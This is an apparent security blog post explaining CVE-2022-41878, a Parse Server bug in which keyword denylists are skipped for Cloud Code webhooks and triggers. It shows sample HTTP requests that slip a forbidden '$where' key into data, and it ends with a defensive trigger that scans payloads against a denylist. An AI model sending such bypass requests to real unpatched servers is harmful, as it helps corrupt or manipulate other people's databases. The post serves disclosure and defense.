Parse Server is a popular, open-source backend framework built with Node.js. Developers love it for its ease of use, flexibility, and plug-and-play nature across infrastructures. But sometimes even powerful tools have security slip-ups. One such bug, CVE-2022-41878, allows clever attackers to sneak restricted keywords past a server's protections.
In this post, we'll break down what CVE-2022-41878 is, why it matters, how attackers can exploit it, and what you can do to stay safe—even if you can't upgrade right now.
## What Is CVE-2022-41878?
Short version:
Certain versions of Parse Server—specifically before 5.3.2 or 4.10.19—have a flaw. The parameter requestKeywordDenylist is supposed to block unwanted keywords (like $where or __system) from getting into your database. However, this protection can be bypassed with carefully crafted requests via Cloud Code Webhooks or Triggers. This means a malicious user can inject forbidden keywords, possibly compromising your backend logic, bypassing restrictions, or worse.
Official Advisory:
- GitHub Security Advisory (GHSA-25j2-8xhh-2wj4)
- NVD Entry (CVE-2022-41878)
## How The Vulnerability Works
A core feature of Parse Server is the Cloud Code functionality. It lets you execute JavaScript functions on your server, triggered by client events. These can be accessed via Webhooks (HTTP calls) or Triggers (like "beforeSave" or "afterDelete").
Usually, the requestKeywordDenylist option is set in your server configuration:

```js
// parse-server index.js snippet
const server = new ParseServer({
  // ... other options ...
  requestKeywordDenylist: ["$where", "__system", "password"]
});
```
The idea is: if a client request includes any of these keywords, it's rejected.
The Problem:
If a request comes through a Cloud Code Webhook or Trigger, that denylist is *not* enforced. This gives attackers a backdoor around the check.
## Exploitation Example (Step-by-Step)
Let's see how simple this can be. For our scenario, imagine you're running Parse Server 4.10.18 (an affected version), with a denylist blocking "$where".
### 1. Set up the Denylist

```js
// index.js (Parse Server startup)
const server = new ParseServer({
  databaseURI: "mongodb://localhost:27017/mydb",
  appId: "myAppId",
  masterKey: "myMasterKey",
  requestKeywordDenylist: ["$where"]
});
```
### 2. Add a Trigger

Suppose you have a trigger like this:

```js
// cloud/main.js
Parse.Cloud.beforeSave("TargetClass", (request) => {
  // Do some business logic...
  // request.object (the incoming data) is saved after this trigger returns
});
```
### 3. Craft the Malicious Request

Usually, if a client tries to send `{"$where": "this.value > 10"}` directly, Parse rejects the request.
But let's say an attacker figures out your webhook endpoint and makes a Cloud Code Webhook call containing the forbidden key as a parameter. Something like:

```http
POST /cloud-code/yourWebhookFunction
{
  "params": {
    "$where": "this.value > 10",
    "otherField": 42
  }
}
```
Or via a crafted beforeSave request that hits the trigger:

```http
POST /classes/TargetClass
{
  "otherField": 42,
  "$where": "this.value > 10"
}
```
The code in the trigger doesn't sanitize or block $where. The object gets updated as normal, and so the forbidden key makes it into your database—bypassing your denylist!
> ⚠️ This can let attackers create objects or modify queries in ways you explicitly tried to prevent.
## Why Is This Dangerous?
- Bypassing Security: Attackers can write restricted fields (__system, $where, etc.) to your database.
- Data Corruption: Malicious data may break app logic or crash clients.
- Potential Injection: If your app later uses these fields unchecked, it may be vulnerable to further injections or logic bugs.
## How to Protect Yourself

### Upgrade
The maintainers patched this bug (fixed in 4.10.19 and 5.3.2). Upgrade ASAP!
### Firewall Your Webhooks
Only allow trusted servers to contact your Cloud Code Webhook endpoint. Use allow/deny rules.
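### Validate Inside Your Triggers

As an added example (not code from the original post or from the Parse Server project), here is a trigger-side check you can drop into cloud/main.js if you cannot upgrade yet: it walks the incoming object, including nested objects and arrays, and rejects the save when any key is on your denylist. The class name `TargetClass` and the denied keys come from the post; the function names are mine, and the matching is plain exact-key comparison, not Parse Server's own `requestKeywordDenylist` logic.

```javascript
// Added example, not from the original post or the Parse Server project.
// Recursive key scan that a beforeSave trigger runs on the incoming object,
// so denied keys are rejected even on the code path the bug left unprotected.

// Keys refused anywhere in the object, at any nesting depth (constructed list).
const DENIED_KEYS = ["$where", "__system"];

// Walk `value` recursively and return the path of every key found in the
// denylist, e.g. ["$where", "meta.$where", "tags[1].__system"].
function findDeniedKeys(value, denylist = DENIED_KEYS, path = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) =>
      hits.push(...findDeniedKeys(item, denylist, `${path}[${i}]`)));
  } else if (value !== null && typeof value === "object") {
    for (const key of Object.keys(value)) {
      const here = path ? `${path}.${key}` : key;
      if (denylist.includes(key)) hits.push(here);
      hits.push(...findDeniedKeys(value[key], denylist, here));
    }
  }
  return hits;
}

// Returns null when the payload is clean, otherwise a message the trigger
// can throw to reject the save.
function validatePayload(payload, denylist = DENIED_KEYS) {
  const hits = findDeniedKeys(payload, denylist);
  return hits.length ? `Denied keyword(s) in request: ${hits.join(", ")}` : null;
}

// Constructed sample payload mirroring the post's crafted request.
const samplePayload = { otherField: 42, $where: "this.value > 10" };
// validatePayload(samplePayload) → "Denied keyword(s) in request: $where"

// Wiring into Cloud Code. `Parse` is a global inside Cloud Code; the guard
// lets this file also load stand-alone (e.g. in unit tests) without the SDK.
if (typeof Parse !== "undefined" && Parse.Cloud) {
  Parse.Cloud.beforeSave("TargetClass", (request) => {
    // toJSON() gives the plain attributes of the incoming object.
    const problem = validatePayload(request.object.toJSON());
    if (problem) throw new Error(problem); // throwing rejects the save
  });
}
```

Trigger-side validation only covers the classes you register it on, so it complements the upgrade rather than replacing it.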
---

## Wrapping Up

CVE-2022-41878 is a good example of how security boundaries often depend on *where* and *how* a request enters your system. Sometimes, simple configs like `requestKeywordDenylist` aren't enforced everywhere, letting attackers find surprising side doors.
Patch up:
- Upgrade if you can.
- Block or protect your Cloud Code Webhooks.
Stay aware and check your Cloud Code for possible edge cases!
---
Further Reading:
- Parse Server GitHub Security Advisory
- CVE-2022-41878 on NVD
- Parse Server Documentation
## Timeline
Published on: 11/10/2022 23:15:00 UTC
Last modified on: 11/15/2022 20:00:00 UTC